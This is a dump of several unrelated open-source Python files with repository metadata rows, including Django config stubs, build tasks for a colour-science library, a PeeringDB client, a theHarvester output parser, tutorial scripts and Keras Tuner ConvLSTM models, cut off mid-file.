For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ChatAj.settings')
application = get_asgi_application()
| [
"[email protected]"
] | |
468a0df45f7aa90ff9775925bbb385b03026e242 | e271c9699d07f4b627ac4cf71b4bb4c233af2eb1 | /packassembler/tests/base.py | 16139e28f40f950802e6ff24fb9993d5d3a3ac3e | [
"Apache-2.0"
] | permissive | PackAssembler/PackAssembler | 379912ff59a00797a35e70ce51ac5cfc7db3b3fc | 284a5f31ec2f05f71fe30397a6da069a0a8cb45f | refs/heads/master | 2016-09-05T17:26:21.017491 | 2014-07-07T13:09:13 | 2014-07-07T13:09:13 | 11,825,806 | 0 | 1 | null | 2014-04-22T03:07:13 | 2013-08-01T19:30:34 | Python | UTF-8 | Python | false | false | 1,119 | py | from pyramid import testing
from copy import copy
class DummyRequest(testing.DummyRequest):
session = {}
def flash(self, msg):
self.session['flash'] = [msg]
def flash_error(self, msg):
self.session['error_flash'] = [msg]
class BaseTest:
def _get_test_class(self):
pass
def make_one(self, *args, **kw):
return self._get_test_class()(*args, **kw)
@classmethod
def setup_class(cls):
cls.config = testing.setUp()
cls.config.include('packassembler')
cls.config.include('pyramid_mailer.testing')
@classmethod
def teardown_class(cls):
testing.tearDown()
def authenticate(self, user):
self.config.testing_securitypolicy(userid=user.username)
def match_request(params=None, **kwargs):
return DummyRequest(matchdict=kwargs, params=params)
def create_rid(name):
return name.replace(' ', '_')
def document_to_data(doc):
data = copy(doc._data)
data['submit'] = ''
filtered = {}
for k, v in data.items():
if v is not None:
filtered[k] = v
return filtered
| [
"[email protected]"
] | |
e7b6ed30d1d3b6ae95bd07204d6d545021943528 | a3ffecad8d176142f0f9b7504503365b8e64bd69 | /turtle2/n2.py | 2bd41ffc2fb2ecbcdad4ab57df34e1a505316357 | [] | no_license | dumb-anchovy/mipt_python_1sem | 517a497d879be1f32530c023af2a9481430c024f | 76d4f378ff74345ac3107d42ce16a68cc5d2e46f | refs/heads/main | 2023-08-27T16:48:18.210559 | 2021-11-02T11:25:17 | 2021-11-02T11:25:17 | 410,534,058 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,199 | py | import turtle as t
a0 = [0, 0, 40, 0, 0, -80, -40, 0, 0, 80, 0, 0]
a1 = [0, -40, 40, 40, 0, -80, -40, 80]
a2 = [0, 0, 40, 0, 0, -40, -40, -40, 40, 0, -40, 80]
a3 = [0, 0, 40, 0, -40, -40, 40, 0, -40, -40, 0, 80]
a4 = [0, 0, 0, -40, 40, 0, 0, -40, 0, 80, -40, 0]
a5 = [40, 0, -40, 0, 0, -40, 40, 0, 0, -40, -40, 0, 0, 80]
a6 = [40, 0, -40, -40, 0, -40, 40, 0, 0, 40, -40, 0, 0, 40]
a7 = [0, 0, 40, 0, -40, -40, 0, -40, 0, 80]
a8 = [0, 0, 40, 0, 0, -40, -40, 0, 0, -40, 40, 0, 0, 40, -40, 0, 0, 40, 0, 0]
a9 = [0, -80, 40, 40, 0, 40, -40, 0, 0, -40, 40, 0, -40, 40]
al = [a0, a1, a2, a3, a4, a5, a6, a7, a8, a9]
def ch(a):
x = t.xcor()
y = t.ycor()
for n in range(0, len(a), 2):
if (n == 0) or (n == len(a) - 2):
x += a[n]
y += a[n + 1]
t.penup()
t.goto(x, y)
t.pendown()
else:
x += a[n]
y += a[n + 1]
t.goto(x, y)
x = -370
y = 0
t.penup()
t.goto(x, y)
t.pendown()
#141700
k = [1, 4, 1, 7, 0, 0]
for j in k:
ch(al[j])
x = t.xcor()
y = t.ycor()
t.penup()
t.goto(x + 80, y)
t.pendown()
t.exitonclick()
| [
"[email protected]"
] | |
489be89dfb47f43097ad446f460e1cbd05328464 | 2cfe527e8a5d9c44aa0f83574b1016ec35755446 | /PyFunnels/PyF_theharvester.py | 4b3c10eeaa1b0b57eb4a4a85d46a07744ac7e1e2 | [
"MIT"
] | permissive | polling-repo-continua/PyFunnels | e3d7a6a89d0369914f5b7ca160c16ea9ebe025c6 | f8089c3c39248eb1ef97f2681c43f76f55a07900 | refs/heads/master | 2022-02-14T12:07:09.866528 | 2019-08-13T17:52:07 | 2019-08-13T17:52:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | import xml.etree.ElementTree as ET
class PyFtheHarvester:
CAPABILITIES = ['domains', 'ips', 'emails']
def __init__(self,
file,
list_domains = [],
list_ips = [],
list_emails = []
):
self.file = file
self.list_domains = list_domains
self.list_ips = list_ips
self.list_emails = list_emails
self.tree = ET.parse(self.file)
self.root = self.tree.getroot()
def domains(self):
for d in self.root.findall('host'):
domain = d.find('hostname').text
if domain not in self.list_domains:
self.list_domains.append(domain)
def ips(self):
for i in self.root.findall('host'):
ip = i.find('ip').text
if ip not in self.list_ips:
self.list_ips.append(ip)
def emails(self):
for e in self.root.findall('email'):
email = e.text
if email not in self.list_emails:
self.list_emails.append(email) | [
"[email protected]"
] | |
3aea4843be237c4dcdce35ea871082ef159c6872 | b9029f7e08bb93c435290e9e01dba3507714bafc | /tasks.py | a64b8ddab455bd356781035556f67836cb43532a | [
"BSD-3-Clause"
] | permissive | njwardhan/colour | 3a4bf7994e25f02e15aa16bc03d35d7f6cc61a50 | 60679360c3990bc549b5f947bfeb621383e18b5e | refs/heads/master | 2022-09-29T06:17:36.380542 | 2020-01-25T05:10:15 | 2020-01-25T05:10:15 | 253,715,920 | 0 | 0 | null | 2020-04-07T07:14:32 | 2020-04-07T07:14:31 | null | UTF-8 | Python | false | false | 13,629 | py | # -*- coding: utf-8 -*-
"""
Invoke - Tasks
==============
"""
from __future__ import unicode_literals
import sys
try:
import biblib.bib
except ImportError:
pass
import fnmatch
import os
import re
import toml
import uuid
from invoke import task
import colour
from colour.utilities import message_box
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = [
'APPLICATION_NAME', 'APPLICATION_VERSION', 'PYTHON_PACKAGE_NAME',
'PYPI_PACKAGE_NAME', 'BIBLIOGRAPHY_NAME', 'clean', 'formatting', 'tests',
'quality', 'examples', 'preflight', 'docs', 'todo', 'requirements',
'build', 'virtualise', 'tag', 'release', 'sha256'
]
APPLICATION_NAME = colour.__application_name__
APPLICATION_VERSION = colour.__version__
PYTHON_PACKAGE_NAME = colour.__name__
PYPI_PACKAGE_NAME = 'colour-science'
BIBLIOGRAPHY_NAME = 'BIBLIOGRAPHY.bib'
@task
def clean(ctx, docs=True, bytecode=False):
"""
Cleans the project.
Parameters
----------
ctx : invoke.context.Context
Context.
docs : bool, optional
Whether to clean the *docs* directory.
bytecode : bool, optional
Whether to clean the bytecode files, e.g. *.pyc* files.
Returns
-------
bool
Task success.
"""
message_box('Cleaning project...')
patterns = ['build', '*.egg-info', 'dist']
if docs:
patterns.append('docs/_build')
patterns.append('docs/generated')
if bytecode:
patterns.append('**/*.pyc')
for pattern in patterns:
ctx.run("rm -rf {}".format(pattern))
@task
def formatting(ctx, yapf=False, asciify=True, bibtex=True):
"""
Formats the codebase with *Yapf*, converts unicode characters to ASCII and
cleanup the "BibTeX" file.
Parameters
----------
ctx : invoke.context.Context
Context.
yapf : bool, optional
Whether to format the codebase with *Yapf*.
asciify : bool, optional
Whether to convert unicode characters to ASCII.
bibtex : bool, optional
Whether to cleanup the *BibTeX* file.
Returns
-------
bool
Task success.
"""
if yapf:
message_box('Formatting codebase with "Yapf"...')
ctx.run('yapf -p -i -r --exclude \'.git\' .')
if asciify:
message_box('Converting unicode characters to ASCII...')
with ctx.cd('utilities'):
ctx.run('./unicode_to_ascii.py')
if bibtex and sys.version_info[:2] >= (3, 2):
message_box('Cleaning up "BibTeX" file...')
bibtex_path = BIBLIOGRAPHY_NAME
with open(bibtex_path) as bibtex_file:
bibtex = biblib.bib.Parser().parse(
bibtex_file.read()).get_entries()
for entry in sorted(bibtex.values(), key=lambda x: x.key):
try:
del entry['file']
except KeyError:
pass
for key, value in entry.items():
entry[key] = re.sub('(?<!\\\\)\\&', '\\&', value)
with open(bibtex_path, 'w') as bibtex_file:
for entry in bibtex.values():
bibtex_file.write(entry.to_bib())
bibtex_file.write('\n')
@task
def tests(ctx, nose=True):
"""
Runs the unit tests with *Nose* or *Pytest*.
Parameters
----------
ctx : invoke.context.Context
Context.
nose : bool, optional
Whether to use *Nose* or *Pytest*.
Returns
-------
bool
Task success.
"""
if nose:
message_box('Running "Nosetests"...')
ctx.run(
'nosetests --with-doctest --with-coverage --cover-package={0} {0}'.
format(PYTHON_PACKAGE_NAME),
env={'MPLBACKEND': 'AGG'})
else:
message_box('Running "Pytest"...')
ctx.run(
'py.test --disable-warnings --doctest-modules '
'--ignore={0}/examples {0}'.format(PYTHON_PACKAGE_NAME),
env={'MPLBACKEND': 'AGG'})
@task
def quality(ctx, flake8=True, rstlint=True):
"""
Checks the codebase with *Flake8* and lints various *restructuredText*
files with *rst-lint*.
Parameters
----------
ctx : invoke.context.Context
Context.
flake8 : bool, optional
Whether to check the codebase with *Flake8*.
rstlint : bool, optional
Whether to lint various *restructuredText* files with *rst-lint*.
Returns
-------
bool
Task success.
"""
if flake8:
message_box('Checking codebase with "Flake8"...')
ctx.run('flake8 {0} --exclude=examples'.format(PYTHON_PACKAGE_NAME))
if rstlint:
message_box('Linting "README.rst" file...')
ctx.run('rst-lint README.rst')
@task
def examples(ctx, plots=False):
"""
Runs the examples.
Parameters
----------
ctx : invoke.context.Context
Context.
plots : bool, optional
Whether to skip or only run the plotting examples: This a mutually
exclusive switch.
Returns
-------
bool
Task success.
"""
message_box('Running examples...')
for root, _dirnames, filenames in os.walk(
os.path.join(PYTHON_PACKAGE_NAME, 'examples')):
for filename in fnmatch.filter(filenames, '*.py'):
if not plots and ('plotting' in root or
'examples_interpolation' in filename or
'examples_contrast' in filename):
continue
if plots and ('plotting' not in root and
'examples_interpolation' not in filename and
'examples_contrast' not in filename):
continue
ctx.run('python {0}'.format(os.path.join(root, filename)))
@task(formatting, tests, quality, examples)
def preflight(ctx):
"""
Performs the preflight tasks, i.e. *formatting*, *tests*, *quality*, and
*examples*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Finishing "Preflight"...')
@task
def docs(ctx, plots=True, html=True, pdf=True):
"""
Builds the documentation.
Parameters
----------
ctx : invoke.context.Context
Context.
plots : bool, optional
Whether to generate the documentation plots.
html : bool, optional
Whether to build the *HTML* documentation.
pdf : bool, optional
Whether to build the *PDF* documentation.
Returns
-------
bool
Task success.
"""
if plots:
with ctx.cd('utilities'):
message_box('Generating plots...')
ctx.run('./generate_plots.py')
with ctx.prefix('export COLOUR_SCIENCE_DOCUMENTATION_BUILD=True'):
with ctx.cd('docs'):
if html:
message_box('Building "HTML" documentation...')
ctx.run('make html')
if pdf:
message_box('Building "PDF" documentation...')
ctx.run('make latexpdf')
@task
def todo(ctx):
"""
Export the TODO items.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Exporting "TODO" items...')
with ctx.cd('utilities'):
ctx.run('./export_todo.py')
@task
def requirements(ctx):
"""
Export the *requirements.txt* file.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Exporting "requirements.txt" file...')
ctx.run('poetry run pip freeze | '
'egrep -v "github.com/colour-science|enum34" '
'> requirements.txt')
@task(clean, preflight, docs, todo, requirements)
def build(ctx):
"""
Builds the project and runs dependency tasks, i.e. *docs*, *todo*, and
*preflight*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Building...')
pyproject_content = toml.load('pyproject.toml')
pyproject_content['tool']['poetry']['name'] = PYPI_PACKAGE_NAME
pyproject_content['tool']['poetry']['packages'] = [{
'include': PYTHON_PACKAGE_NAME,
'from': '.'
}]
with open('pyproject.toml', 'w') as pyproject_file:
toml.dump(pyproject_content, pyproject_file)
ctx.run('poetry build')
ctx.run('git checkout -- pyproject.toml')
with ctx.cd('dist'):
ctx.run('tar -xvf {0}-{1}.tar.gz'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('cp {0}-{1}/setup.py ../'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('rm -rf {0}-{1}'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
with open('setup.py') as setup_file:
source = setup_file.read()
setup_kwargs = []
def sub_callable(match):
setup_kwargs.append(match)
return ''
template = """
setup({0}
)
"""
source = re.sub(
'setup_kwargs = {(.*)}.*setup\\(\\*\\*setup_kwargs\\)',
sub_callable,
source,
flags=re.DOTALL)[:-2]
setup_kwargs = setup_kwargs[0].group(1).splitlines()
for i, line in enumerate(setup_kwargs):
setup_kwargs[i] = re.sub('^\\s*(\'(\\w+)\':\\s?)', ' \\2=', line)
if setup_kwargs[i].strip().startswith('long_description'):
setup_kwargs[i] = (
' long_description=open(\'README.rst\').read(),')
source += template.format('\n'.join(setup_kwargs))
with open('setup.py', 'w') as setup_file:
setup_file.write(source)
@task
def virtualise(ctx, tests=True):
"""
Create a virtual environment for the project build.
Parameters
----------
ctx : invoke.context.Context
Context.
tests : bool, optional
Whether to run tests on the virtual environment.
Returns
-------
bool
Task success.
"""
unique_name = '{0}-{1}'.format(PYPI_PACKAGE_NAME, uuid.uuid1())
with ctx.cd('dist'):
ctx.run('tar -xvf {0}-{1}.tar.gz'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('mv {0}-{1} {2}'.format(PYPI_PACKAGE_NAME, APPLICATION_VERSION,
unique_name))
with ctx.cd(unique_name):
ctx.run('poetry env use 3')
ctx.run('poetry install --extras "optional plotting"')
ctx.run('source $(poetry env info -p)/bin/activate')
ctx.run('python -c "import imageio;'
'imageio.plugins.freeimage.download()"')
if tests:
ctx.run('poetry run nosetests', env={'MPLBACKEND': 'AGG'})
@task
def tag(ctx):
"""
Tags the repository according to defined version using *git-flow*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Tagging...')
result = ctx.run('git rev-parse --abbrev-ref HEAD', hide='both')
assert result.stdout.strip() == 'develop', (
'Are you still on a feature or master branch?')
with open(os.path.join(PYTHON_PACKAGE_NAME, '__init__.py')) as file_handle:
file_content = file_handle.read()
major_version = re.search("__major_version__\\s+=\\s+'(.*)'",
file_content).group(1)
minor_version = re.search("__minor_version__\\s+=\\s+'(.*)'",
file_content).group(1)
change_version = re.search("__change_version__\\s+=\\s+'(.*)'",
file_content).group(1)
version = '.'.join((major_version, minor_version, change_version))
result = ctx.run('git ls-remote --tags upstream', hide='both')
remote_tags = result.stdout.strip().split('\n')
tags = set()
for remote_tag in remote_tags:
tags.add(
remote_tag.split('refs/tags/')[1].replace('refs/tags/', '^{}'))
tags = sorted(list(tags))
assert 'v{0}'.format(version) not in tags, (
'A "{0}" "v{1}" tag already exists in remote repository!'.format(
PYTHON_PACKAGE_NAME, version))
ctx.run('git flow release start v{0}'.format(version))
ctx.run('git flow release finish v{0}'.format(version))
@task(clean, build)
def release(ctx):
"""
Releases the project to *Pypi* with *Twine*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Releasing...')
with ctx.cd('dist'):
ctx.run('twine upload *.tar.gz')
ctx.run('twine upload *.whl')
@task
def sha256(ctx):
"""
Computes the project *Pypi* package *sha256* with *OpenSSL*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Computing "sha256"...')
with ctx.cd('dist'):
ctx.run('openssl sha256 {0}-*.tar.gz'.format(PYPI_PACKAGE_NAME))
| [
"[email protected]"
] | |
0800aa7da0792d7332654f3ccb4b3ad85fd99712 | 59216c8fa10e1b35b6defecd0d103cb29413a4b3 | /stupyde/fixes/utime.py | 770d09f1dd24cec15d64c648ddf3db69ee16d05b | [
"MIT"
] | permissive | pmp-p/stupyde | d0ca43e1ea5dbec6ce074afc301df6f40985d2e3 | 725bfc790999589c20fb2eea5dc75e03fc5d7ff4 | refs/heads/master | 2021-07-18T03:44:13.272593 | 2020-05-10T04:56:57 | 2020-05-10T04:56:57 | 152,827,405 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 879 | py | import time as _time
MICROPY_PY_UTIME_TICKS_PERIOD = 2**30
if sys.version_info[0:2]>(3,7):
_PASSTHRU = ("time", "sleep", "process_time", "localtime")
def clock():
return _time.process_time()
else:
_PASSTHRU = ("time", "sleep", "clock", "localtime")
for f in _PASSTHRU:
globals()[f] = getattr(_time, f)
def sleep_ms(t):
_time.sleep(t / 1000)
def sleep_us(t):
_time.sleep(t / 1000000)
def ticks_ms():
return int(_time.time() * 1000) & (MICROPY_PY_UTIME_TICKS_PERIOD - 1)
def ticks_us():
return int(_time.time() * 1000000) & (MICROPY_PY_UTIME_TICKS_PERIOD - 1)
ticks_cpu = ticks_us
def ticks_add(t, delta):
return (t + delta) & (MICROPY_PY_UTIME_TICKS_PERIOD - 1)
def ticks_diff(a, b):
return ((a - b + MICROPY_PY_UTIME_TICKS_PERIOD // 2) & (MICROPY_PY_UTIME_TICKS_PERIOD - 1)) - MICROPY_PY_UTIME_TICKS_PERIOD // 2
del f
| [
"[email protected]"
] | |
94a4be74fbb2627846ed9d68f324dbf2a692b318 | f749d098555c7be9e1693aab470ed260779baf1e | /函数/main.py | c6d78391b84e124ffaa1df7dcb2585cd93198ef4 | [] | no_license | es716/study-Python | 77ece1828aec0d383c5376eddcf4b7bc593c53c1 | 3a7879e23468f981801ee4428583e0cd13848b08 | refs/heads/master | 2021-01-11T00:20:56.205252 | 2016-10-11T04:08:05 | 2016-10-11T04:08:05 | 70,545,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#==============================================
from test import my_abs,power,add_end,calc,person,person1,person2
names = [1, 2, 3]
print(my_abs(-90))
print (power(25, 5))
print (power(25))
print (add_end())
print (add_end())
print (calc(1,2,3))
print (calc())
print (calc(*names))
person('es',16)
person('es',16,country='China')
person('es',16,country='China',city='Beijing')
person1('es',16,city='Beijing',job = 'studence')
#person1('Jack', 24, 'Beijing', 'Engineer')
person2('es',16,city='Beijing',job = 'studence')
person2('es',16)
'''
获取网页
import urllib.request
def getHtml(url):
page = urllib.request.urlopen(url)
html = page.read()
return html.decode('UTF-8')
html = getHtml("https://movie.douban.com/")
print (html)
'''
| [
"[email protected]"
] | |
8255c837aa16fadcba7eb5b77f8cdb00c4d40c4e | 6b97237bfd9647f7a90c1d1c33b4453c07e56839 | /routingpolicy/peeringdb.py | 1785b3738e64605815f3565b2ae6a6f5cfd0589e | [
"MIT"
] | permissive | 48ix/routingpolicy | 4e9803659daf84478e3bf41db90a8df642fb50e8 | fd3e9547a5c54bd78ee2144786f6b30fdf41d7ef | refs/heads/master | 2023-01-30T03:20:37.440933 | 2020-12-16T17:19:39 | 2020-12-16T17:19:39 | 295,359,872 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,392 | py | """Get Participant Information via the PeeringDB API."""
# Standard Library
from typing import Tuple, Sequence
# Third Party
from httpx import AsyncClient
# Project
from routingpolicy.log import log
async def max_prefixes(asn: int) -> Tuple[int, int]:
"""Search PeeringDB for an entry matching an ASN and return its max prefixes."""
prefixes = (200, 20)
async with AsyncClient(
http2=True,
verify=True,
base_url="https://peeringdb.com",
headers={"Accept": "application/json"},
) as client:
log.debug("Getting max prefixes for AS{}", str(asn))
res = await client.get("/api/net", params={"asn__contains": asn})
res.raise_for_status()
for data in res.json()["data"]:
if "asn" in data and data["asn"] == asn:
log.debug("Matched AS{} to {}", str(asn), data["name"])
log.debug(
"AS{} PeeringDB Org ID {}, last updated {}",
str(asn),
str(data["org_id"]),
data["updated"],
)
prefixes = (
data.get("info_prefixes4", 200),
data.get("info_prefixes6", 20),
)
return prefixes
async def get_as_set(asn: str) -> Sequence[str]:
"""Search PeeringDB for an entry matching an ASN and return its IRR AS_Set."""
result = []
async with AsyncClient(
http2=True,
verify=True,
base_url="https://peeringdb.com",
headers={"Accept": "application/json"},
) as client:
log.debug("Getting max prefixes for AS{}", asn)
res = await client.get("/api/net", params={"asn__contains": asn})
res.raise_for_status()
for data in res.json()["data"]:
if "asn" in data and str(data["asn"]) == asn:
log.debug("Matched AS{} to {}", str(asn), data["name"])
log.debug(
"AS{} PeeringDB Org ID {}, last updated {}",
str(asn),
str(data["org_id"]),
data["updated"],
)
as_set = data.get("irr_as_set", "")
if as_set != "":
result = as_set.split(" ")
log.debug("Found AS-Set(s) {} for {}", result, data["name"])
break
return result
| [
"[email protected]"
] | |
abdf9a3a6958959db50b3339852f2f49dff0d58a | cf57c29736ff6841b0024740201f7fe5dc9430da | /amiibo_comments/wsgi.py | f7000b8488316dbcb8098eccde6cf68555a4ee81 | [] | no_license | zedsousa/amiibo_comments | 9e224da4e1b48171536ba6919bf47527f940632e | 7254f4feb7cd61b38d7036e27a84b18169379abd | refs/heads/main | 2023-07-08T04:38:37.551955 | 2021-08-16T00:34:34 | 2021-08-16T00:34:34 | 396,533,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | """
WSGI config for amiibo_comments project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'amiibo_comments.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
faf52cb7ec3df25b917e3e95f90c424dd7835be9 | 6c516e6bfb610209b82fd5b97b8cc56613d46813 | /day8/dict01.py | cad85366580f9596c59e34bb69c6e77cbbc0226a | [] | no_license | Eric-cv/QF_Python | 7497d1629d24b78aad141d42de5a28b00da207a4 | 8832faaf63e6fbaaeb2d50befa53d86547c31042 | refs/heads/master | 2022-06-16T21:34:48.077318 | 2020-05-11T11:57:03 | 2020-05-11T11:57:03 | 263,021,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,271 | py | # dictionary 字典
'''
应用:
貂蝉 --- ['屠龙刀','手榴弹'] 800
诸葛亮 --- ['鹅毛扇','碧血剑','98k枪'] 300
字典:
特点:
1.符号:{}
2.关键字:dict
3.保存的元素的:key:value 键值对
列表 元组 字典
[] () {}
list tuple dict
ele ele key:value #element 元素
'''
# 定义
dict1 = {} # 空字典
dict2 = dict() # 空字典 list=list() 空列表 tuple=tuple() 空元组
dict3 = {'ID':'220821199601010018','name':'Eric','age':18}
dict4 = dict([('name','Eric'),('age',18)]) # 'name':'Eric','age':18
dict5 = dict([(1,2,3),(4,5),(6,8),(9,0)]) # three too much , two expected
# 注意:list可以转成字典 但是前提:列表中的元素都要成对出现
# 字典的增删改查
# 增加:格式:dict[key]=value
# 特点:按照上面的格式,如果字典中存在同名的key,则发生值的覆盖
# 如果没有同名的key,则实现添加的功能(key:value添加到字典中)
dict6 = {}
# 格式:dict6[key] = value
dict6['brand']='huawei'
print(dict6) #{'brand':'huawei'}
dict6['brand']='mi'
dict6['type']='p30 pro'
dict6['price']=9000
dict6['color']='黑色'
print(dict6)
'''
案例:
用户注册功能
username
password
email
phone
'''
| [
"[email protected]"
] | |
9a7a6e1d171bf14644f7c0a4335a2de37ac7d303 | cfb33f980471042e104a928a09c2e23b983b485f | /Subset/binsearch.py | a5b297922a5780e65cf3005ff88eedc028e2e2ec | [] | no_license | shilpchk/NetworkStructure | 22d819ed9bce217f04366b0f61533ef3e135848a | 5ea3126455ccfe5a8e7fc1e40fd08b9bd6f9e921 | refs/heads/master | 2021-01-19T11:09:24.447938 | 2017-04-11T12:55:52 | 2017-04-11T12:55:52 | 87,933,916 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | def binsearch(value, arr, N):
low=0; high=N;
while(low < high):
mid = low + int((high-low)/2);
if(arr[mid] < value):
low = mid+1;
else:
high = mid;
return low
| [
"[email protected]"
] | |
1b1ef729bfe6870880ec2b3f58f8d04117f29bc5 | ddf9d47a06ce85f9d06ec4923982f96996e028a7 | /Notebooks/Entrenamiento Modelo/CustomHyperModelImages.py | 2f49fceefd6a2ddbc8d07d8b4f3d7947bbe71e0f | [] | no_license | SebasPelaez/colombia-energy-forecast | f7b7a184026d3eb22a2087fda39249998ba1128e | 269d432dfda0e976aa06d1b9b7804945d9362af3 | refs/heads/master | 2023-04-14T18:36:14.294769 | 2021-04-21T14:01:58 | 2021-04-21T14:01:58 | 286,310,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,779 | py | import tensorflow as tf
import CustomMetrics
from kerastuner import HyperModel
class ArquitecturaI1(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_3", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=3
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_5", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_5", min_value=3, max_value=5, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_5",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_6", min_value=3, max_value=5, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_8", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI2(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_1", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_1",
values=["valid", "same"],
default="valid"
),
return_sequences=True
)
)
model.add(
tf.keras.layers.TimeDistributed(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_2", min_value=3, max_value=5, step=2, default=3
)
)
)
)
model.add(
tf.keras.layers.ConvLSTM2D(
filters=hp.Int(
"convLSTM2d_filters_layer_3", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
"convLSTM2d_kernel_layer_3", min_value=3, max_value=7, step=2, default=3
),
activation='relu',
padding=hp.Choice(
"conv2d_padding_layer_3",
values=["valid", "same"],
default="valid"
),
return_sequences=False
)
)
model.add(
tf.keras.layers.MaxPooling2D(
pool_size=hp.Int(
"pool2d_size_layer_4", min_value=3, max_value=5, step=2, default=3
)
)
)
model.add(
tf.keras.layers.Flatten()
)
model.add(
tf.keras.layers.Dense(
units=hp.Int(
"dense_units_layer_6", min_value=24, max_value=120, step=24, default=120
),
activation=hp.Choice(
"dense_layer_6_activation",
values=["relu", "tanh", "sigmoid"],
default="relu"
)
)
)
model.add(tf.keras.layers.Dense(units=self.n_steps_out,activation=None))
model.compile(
optimizer=tf.optimizers.Adam(
hp.Float(
"learning_rate",
min_value=1e-4,
max_value=1e-2,
sampling="LOG",
default=1e-3,
)
),
loss=CustomMetrics.symmetric_mean_absolute_percentage_error,
metrics=[
tf.metrics.MeanAbsoluteError(),
tf.keras.metrics.MeanAbsolutePercentageError(),
CustomMetrics.symmetric_mean_absolute_percentage_error],
)
return model
class ArquitecturaI3(HyperModel):
def __init__(self,input_shape,n_steps_out):
self.input_shape = input_shape
self.n_steps_out = n_steps_out
def build(self, hp):
model = tf.keras.Sequential()
model.add(
tf.keras.layers.ConvLSTM2D(
input_shape=self.input_shape,
filters=hp.Int(
"convLSTM2d_filters_layer_1", min_value=8, max_value=32, step=32, default=32
),
kernel_size=hp.Int(
